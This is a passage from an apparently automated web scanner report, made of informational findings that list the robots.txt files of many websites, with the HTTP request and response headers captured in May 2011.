Server: Apache/2.2.17 (Unix) PHP/5.3.5
X-Powered-By: PHP/5.3.5
X-Pingback: http://freexpreviews.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.423. http://www.freshgrub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freshgrub.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freshgrub.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:20 GMT
Server: Apache
Last-Modified: Sat, 14 Aug 2010 11:08:57 GMT
ETag: "1138ce9-18-48dc6a030afeb"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

26.424. http://www.fridgefilters.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fridgefilters.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fridgefilters.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:44 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 11:30:44 GMT
Last-Modified: Tue, 19 Apr 2011 05:05:07 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.425. http://www.friestube.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.friestube.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.friestube.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:41:12 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch
Last-Modified: Thu, 25 Nov 2010 20:22:30 GMT
ETag: "200b63a-26-495e65d817608"
Accept-Ranges: bytes
Content-Length: 38
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/atx/

26.426. http://www.fromoldbooks.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fromoldbooks.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fromoldbooks.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:52:21 GMT
Server: Apache
Last-Modified: Wed, 12 Aug 2009 13:14:47 GMT
ETag: "633438-59-9a6b5fc0"
Accept-Ranges: bytes
Content-Length: 89
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=1382400
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /~liam
Disallow: /Wallpaperify
Crawl-Delay: 3

26.427. http://www.full-penetration.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.full-penetration.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.full-penetration.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:36 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 27 Aug 2010 16:24:07 GMT
ETag: "47d00db-88-48ed08b39b7c0"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

sitemap: http://cdn.attracta.com/sitemap/138996.xml.gz

sitemap: http://cdn.attracta.com/sitemap/138997.xml.gz

26.428. http://www.funcityfinder.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.funcityfinder.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funcityfinder.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:46 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.11
Expires: Tue, 26 Apr 2011 10:28:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://funcityfinder.com/xmlrpc.php
Last-Modified: Tue, 03 May 2011 10:28:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://funcityfinder.com/sitemap.xml

26.429. http://www.fundmojo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fundmojo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fundmojo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:27 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 22 Mar 2009 06:32:07 GMT
ETag: "23d38481-24-465af4f1067c0"
Accept-Ranges: bytes
Content-Length: 36
Cache-Control: max-age=86400
Expires: Wed, 04 May 2011 10:32:27 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

26.430. http://www.funeralquestions.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.funeralquestions.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funeralquestions.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Content-Location: http://www.funeralquestions.com/robots.txt
Last-Modified: Wed, 20 Apr 2005 18:41:59 GMT
Accept-Ranges: bytes
ETag: "6d9deba2d845c51:18071"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:51:47 GMT
Connection: close

User-agent: *
Disallow: /

26.431. http://www.funny-potato.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.funny-potato.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funny-potato.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:09 GMT
Server: Apache
Last-Modified: Tue, 23 May 2006 00:51:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 22
Connection: close
Content-Type: text/plain

user-agent:*
disallow:

26.432. http://www.gadsdentimes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gadsdentimes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gadsdentimes.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 18:51:12 GMT
Accept-Ranges: bytes
ETag: "25bddc23e75cb1:0"
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 09:01:11 GMT
Content-Length: 645
Age: 4865
X-Cache: HIT from nysquid01
X-Cache-Lookup: HIT from nysquid01:80
Via: 1.0 nysquid01 (squid/3.0.STABLE18)
Connection: close

User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbcs.dll/events
Disallow: /apps/pbcs.dll/index
Disallow: /apps/pbcs.dll/temaoversikt
Disallow: /apps/pbcs.dll/related
Disallow:
...[SNIP]...

26.433. http://www.gameguidedog.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gameguidedog.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gameguidedog.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:00:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 27 Mar 2011 20:18:02 GMT
ETag: "297812d-19f-49f7c86225280"
Accept-Ranges: bytes
Content-Length: 415
Connection: close
Content-Type: text/plain

User-agent: baiduspider
Disallow: /
User-agent: *
Disallow: /cgi-bin/
Disallow: /game-walkthrough/wp-admin
Disallow: /game-walkthrough/wp-includes
Disallow: /game-walkthrough/wp-content/plugins
...[SNIP]...

26.434. http://www.gamingblog.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamingblog.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamingblog.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:29 GMT
Server: Apache
Last-Modified: Thu, 25 Feb 2010 09:06:16 GMT
ETag: "8a8e07-17-4806918647200"
Accept-Ranges: bytes
Content-Length: 23
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:28:29 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /

26.435. http://www.ganet.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ganet.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ganet.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:59 GMT
Server: Apache/2.2.14
Last-Modified: Tue, 01 Mar 2011 21:01:04 GMT
ETag: "197-49d721828c400"
Accept-Ranges: bytes
Content-Length: 407
Cache-Control: max-age=86400
Expires: Wed, 04 May 2011 10:18:59 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for: http://www.ganet.org/

User-agent: *
Disallow: /admin
Disallow: /api
Disallow: /bak
Disallow: /cache
Disallow: /data
Disallow: /dev
Disallow: /docs
Disallow: /gcrawl
Disal
...[SNIP]...

26.436. http://www.gardens.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gardens.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gardens.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:05 GMT
Server: Apache
Last-Modified: Tue, 09 Mar 2010 23:28:43 GMT
ETag: "35cb2a-529-481668ad980c0"
Accept-Ranges: bytes
Content-Length: 1321
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: BIGipServerdavesgarden_pool=417665196.20480.0000; path=/

User-agent: *

Disallow: /mail/
Disallow: /signup.php
Disallow: /login.php
Disallow: /loggedin.php
Disallow: /logout.php
Disallow: /loggedout.php
Disallow: /about/
Disallow: /not.php
Disallo
...[SNIP]...

26.437. http://www.gavilan.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gavilan.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gavilan.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:45 GMT
Server: Apache
Last-Modified: Sat, 26 Mar 2011 04:29:15 GMT
Accept-Ranges: bytes
Content-Length: 870
Cache-Control: max-age=300
Expires: Tue, 03 May 2011 11:16:45 GMT
Connection: close
Content-Type: text/plain; charset=iso-8859-1

#####
#
# robots.txt for http://www.gavilan.edu/
#
#####

User-agent: *

Disallow: /cgi-bin/
Disallow: /php-bin/
Disallow: /PHPlib/

Disallow: /styles/
Disallow: /scripts/
Disallow: /icons/
Disallow:
...[SNIP]...

26.438. http://www.gazettenet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gazettenet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gazettenet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:20 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 14 Oct 2009 22:47:40 GMT
ETag: "292b78-690-f3365b00"
Accept-Ranges: bytes
Content-Length: 1680
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:56:20 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.2 2008/02/25 02:18:25 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

26.439. http://www.geniecompany.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.geniecompany.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.geniecompany.com

Response

HTTP/1.1 200 OK
Content-Length: 292
Content-Type: text/plain
Last-Modified: Fri, 29 Apr 2011 17:20:22 GMT
Accept-Ranges: bytes
ETag: "2b2fceb8916cc1:37b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:12:41 GMT
Connection: close

...User-Agent: *

Allow: /

Disallow: README.txt
Disallow: /BackupDoNOTdeleteORedit
Disallow: /Hold Original
Disallow: /RM
Disallow: BrowserInfoForMasterPages.txt
Disallow: HOLD_OriginalMenuP
...[SNIP]...

26.440. http://www.geogroup.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.geogroup.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.geogroup.com

Response

HTTP/1.1 200 OK
Content-Length: 129
Content-Type: text/plain
Last-Modified: Tue, 22 Jun 2010 05:38:05 GMT
Accept-Ranges: bytes
ETag: "106b9516cd11cb1:227903"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:56:47 GMT
Connection: close

User-Agent: *
Disallow: /New/
Disallow: /thegeogroup/
Disallow: /alumni/
Disallow: /alumni/
Disallow:/facility.asp?fid=133

26.441. http://www.germanna.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.germanna.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.germanna.edu

Response

HTTP/1.1 200 OK
Content-Length: 132
Content-Type: text/plain
Last-Modified: Thu, 19 Jun 2008 19:48:59 GMT
Accept-Ranges: bytes
ETag: "c68a2f8445d2c81:d02"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:19:15 GMT
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.442. http://www.gerweck.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gerweck.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gerweck.net

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:27:37 GMT
Server: Apache
Vary: Cookie
Set-Cookie: PHPSESSID=i20vol12720i6j2uguht88ahe5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.gerweck.net/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.gerweck.net/sitemap.xml

26.443. http://www.get-music.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.get-music.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.get-music.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:16:33 GMT
Content-Type: text/plain
Content-Length: 88
Last-Modified: Sat, 01 Aug 2009 11:12:42 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /invisible/
Disallow: /logs/
Disallow: /user/
Disallow: /LE/

26.444. http://www.getgrantinfo.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.getgrantinfo.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.getgrantinfo.net

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Tue, 03 May 2011 10:59:13 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-anhnedcp=7F86A37332AC072909477AE792DAE26F; path=/
Last-Modified: Wed, 25 Aug 2010 16:35:25 GMT
Content-Length: 124

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.445. http://www.getmyhomesvalue.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.getmyhomesvalue.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.getmyhomesvalue.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.getmyhomesvalue.com/xmlrpc.php
Set-Cookie: PHPSESSID=crdubc84cjhnoqb0gdcvj1j0o0; path=/
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.446. http://www.getzips.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.getzips.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.getzips.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:53:59 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 31 Oct 2010 13:27:32 GMT
ETag: "aa0c45fff78cb1:cd2"
Content-Length: 162

User-Agent: *
Disallow: /faq/
Disallow: /error/
Disallow: /new/
Disallow: /help/
Disallow: /images/
Disallow: /cgi-bin/
Disallow: /upd/
Disallow: /gifs/

26.447. http://www.giftcards.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.giftcards.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.giftcards.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:32 GMT
Server: Apache
Set-Cookie: PHPSESSID=eca284511a6e0a7befb3513441f60d2b; path=/; domain=.giftcards.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 132
Connection: close
Content-Type: text/plain; charset=UTF-8

# Full access (All Spiders)
User-agent: *
Disallow: /shopping
Disallow: /account
sitemap: http://www.giftcards.com/sitemap.xml

26.448. http://www.gigamoves.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gigamoves.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gigamoves.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:15 GMT
Server: Apache/2.2.3 (Fedora)
Last-Modified: Fri, 15 Apr 2011 19:50:51 GMT
ETag: "1030009-100-5be75cc0"
Accept-Ranges: bytes
Content-Length: 256
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_mc-qspe-hn-iuuq-pvu=446c313e3660;expires=Tue, 03-May-11 11:06:15 GMT;path=/

User-agent: *
Disallow: /account/
Disallow: /api/
Disallow: /common/
Disallow: /css/
Disallow: /error/
Disallow: /img/
Disallow: /inside/
Disallow: /javascript/
Disallow: /motors/
Disallow: /site/
Dis
...[SNIP]...

26.449. http://www.givemefile.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.givemefile.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.givemefile.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:19:06 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 16 Apr 2009 06:01:31 GMT
ETag: "61ca4d-24-cba9a4c0"
Accept-Ranges: bytes
Content-Length: 36

User-Agent: *
Disallow: /printnews/

26.450. http://www.gizmodefenderstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gizmodefenderstore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gizmodefenderstore.com

Response

HTTP/1.1 200 OK
Content-Length: 126
Content-Type: text/plain
Last-Modified: Mon, 19 Oct 2009 22:41:58 GMT
Accept-Ranges: bytes
ETag: "0bf955dd51ca1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:01:12 GMT
Connection: close

User-agent: *
Disallow: /images/spacer.gif
Disallow: /ct.html
Disallow: /sd/
Disallow: /st.aspx
Disallow: /ct/ct.aspx

26.451. http://www.globalpharmacycanada.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.globalpharmacycanada.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.globalpharmacycanada.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:24 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sun, 09 Jan 2011 06:01:26 GMT
ETag: "88102f-176-4996394e9b980"
Accept-Ranges: bytes
Content-Length: 374
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.452. http://www.globrix.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.globrix.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.globrix.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:22 GMT
Server: Globrix
Status: 200
ETag: "d9d3357389fc4b21ae753ea84f1d5e8b"
X-Runtime: 5
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/plain; charset=utf-8
Content-Length: 3662
Set-Cookie: _session_id=32e5c102fec4daa26e26f36cca8ee0ff; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

Sitemap: http://www.globrix.com/gbxsitemapindex.xml

User-agent: googlebot
Disallow: /*?
Disallow
...[SNIP]...

26.453. http://www.goal-setting-college.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.goal-setting-college.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goal-setting-college.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:30 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 19 Apr 2011 08:39:40 GMT
ETag: "973815b-14b-4a14172ee2b00"
Accept-Ranges: bytes
Content-Length: 331
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.goal-setting-college.com/sitemap.xml

User-Agent: *
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /urlmo_admin/
Disallow: /urlmo_common/
Disallow: /
...[SNIP]...

26.454. http://www.gocurrency.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gocurrency.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gocurrency.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 19 May 2010 13:22:53 GMT
ETag: "68e05d1-89-486f25af42540"
Accept-Ranges: bytes
Content-Length: 137
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /d/
Disallow: /aol/
Disallow: /tracking/
Disallow: /js/
Disallow: /img/
Disallow: /cgi-bin/
Disallow: /directory/

26.455. http://www.godempire.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godempire.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.godempire.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Sun, 01 Mar 2009 15:44:39 GMT
ETag: "1690009-21-464109468e7c0"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /link/

26.456. http://www.goholycross.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.goholycross.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goholycross.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:07 GMT
Server: Resin/3.0.18
ETag: "4IvHnsk8N+J"
Last-Modified: Fri, 11 Jun 2010 09:40:58 GMT
Content-Type: text/plain
Content-Length: 445
Connection: close

# Managed by PrestoSports sysadmin@prestosports.com
User-agent: american-univ-crawler (Enterprise; S5-DWRRJ5KWB2NAA; nguyen@american.edu)
Disallow: /

User-agent: CSTV Search Crawler
Disallow: /

User
...[SNIP]...

26.457. http://www.goldcycler.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.goldcycler.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goldcycler.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:40:56 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Thu, 18 Jun 2009 16:28:26 GMT
ETag: "ae4ec0ce31f0c91:1f3f"
Content-Length: 80

User-agent: *
Disallow: /admin/
Disallow: /includes/
Disallow: /confirm.asp

26.458. http://www.google.ch/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.ch
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.ch

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 11:35:35 GMT
Expires: Tue, 03 May 2011 11:35:35 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.459. http://www.google.dk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.dk
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.dk

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 11:38:53 GMT
Expires: Tue, 03 May 2011 11:38:53 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.460. http://www.google.gr/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.gr
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.gr

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 10:39:42 GMT
Expires: Tue, 03 May 2011 10:39:42 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
